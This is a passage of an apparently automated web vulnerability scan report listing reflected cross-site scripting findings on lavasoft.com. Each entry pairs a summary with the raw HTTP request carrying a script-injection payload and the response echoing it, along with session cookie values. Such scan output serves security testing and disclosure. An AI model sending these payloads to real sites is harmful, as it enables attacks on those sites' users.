Date: Wed, 07 Sep 2011 12:38:29 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18236
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck/theme9aea8'><script>alert(1)</script>4cffde98153/content-module.css'>
...[SNIP]...

1.240. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/theme/content-module.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 73511'><script>alert(1)</script>c5406345189 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck/theme/content-module.css73511'><script>alert(1)</script>c5406345189?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18236
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck/theme/content-module.css73511'><script>alert(1)</script>c5406345189'>
...[SNIP]...

1.241. http://www.lavasoft.com/mylavasoft/sites/all/modules/date/date.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/date/date.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c661'><script>alert(1)</script>0a62e16d3fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft9c661'><script>alert(1)</script>0a62e16d3fe/sites/all/modules/date/date.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:22 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:22 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10635
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft9c661'><script>alert(1)</script>0a62e16d3fe/sites/all/modules/date/date.css?w'>
...[SNIP]...

1.242. http://www.lavasoft.com/mylavasoft/sites/all/modules/date/date.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/date/date.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8cfc3'><script>alert(1)</script>4c747395f1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites8cfc3'><script>alert(1)</script>4c747395f1e/all/modules/date/date.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18244
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites8cfc3'><script>alert(1)</script>4c747395f1e/all/modules/date/date.css'>
...[SNIP]...

1.243. http://www.lavasoft.com/mylavasoft/sites/all/modules/date/date.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/date/date.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57892'><script>alert(1)</script>525c9a42ecb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all57892'><script>alert(1)</script>525c9a42ecb/modules/date/date.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18206
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all57892'><script>alert(1)</script>525c9a42ecb/modules/date/date.css'>
...[SNIP]...

1.244. http://www.lavasoft.com/mylavasoft/sites/all/modules/date/date.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/date/date.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e61b2'><script>alert(1)</script>38c945aceb9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modulese61b2'><script>alert(1)</script>38c945aceb9/date/date.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18206
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modulese61b2'><script>alert(1)</script>38c945aceb9/date/date.css'>
...[SNIP]...

1.245. http://www.lavasoft.com/mylavasoft/sites/all/modules/date/date.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/date/date.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fea05'><script>alert(1)</script>78d28eed1ea was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/datefea05'><script>alert(1)</script>78d28eed1ea/date.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18206
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/datefea05'><script>alert(1)</script>78d28eed1ea/date.css'>
...[SNIP]...

1.246. http://www.lavasoft.com/mylavasoft/sites/all/modules/date/date.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/date/date.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 95ae9'><script>alert(1)</script>7c6187b617e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/date/date.css95ae9'><script>alert(1)</script>7c6187b617e?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18206
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/date/date.css95ae9'><script>alert(1)</script>7c6187b617e'>
...[SNIP]...

1.247. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/css/fivestar.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/css/fivestar.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b330d'><script>alert(1)</script>bff079bfb71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoftb330d'><script>alert(1)</script>bff079bfb71/sites/all/modules/fivestar/css/fivestar.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:24 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:24 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10647
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoftb330d'><script>alert(1)</script>bff079bfb71/sites/all/modules/fivestar/css/fivestar.css?w'>
...[SNIP]...

1.248. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/css/fivestar.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/css/fivestar.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1140'><script>alert(1)</script>fcee36dbee2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sitesd1140'><script>alert(1)</script>fcee36dbee2/all/modules/fivestar/css/fivestar.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:37 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18268
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sitesd1140'><script>alert(1)</script>fcee36dbee2/all/modules/fivestar/css/fivestar.css'>
...[SNIP]...

1.249. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/css/fivestar.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/css/fivestar.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e88c2'><script>alert(1)</script>700ae535ace was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/alle88c2'><script>alert(1)</script>700ae535ace/modules/fivestar/css/fivestar.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18230
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/alle88c2'><script>alert(1)</script>700ae535ace/modules/fivestar/css/fivestar.css'>
...[SNIP]...

1.250. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/css/fivestar.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/css/fivestar.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57c7c'><script>alert(1)</script>8e290d4d4b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules57c7c'><script>alert(1)</script>8e290d4d4b1/fivestar/css/fivestar.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18230
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules57c7c'><script>alert(1)</script>8e290d4d4b1/fivestar/css/fivestar.css'>
...[SNIP]...

1.251. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/css/fivestar.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/css/fivestar.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bb6be'><script>alert(1)</script>8d96e95fe62 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/fivestarbb6be'><script>alert(1)</script>8d96e95fe62/css/fivestar.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
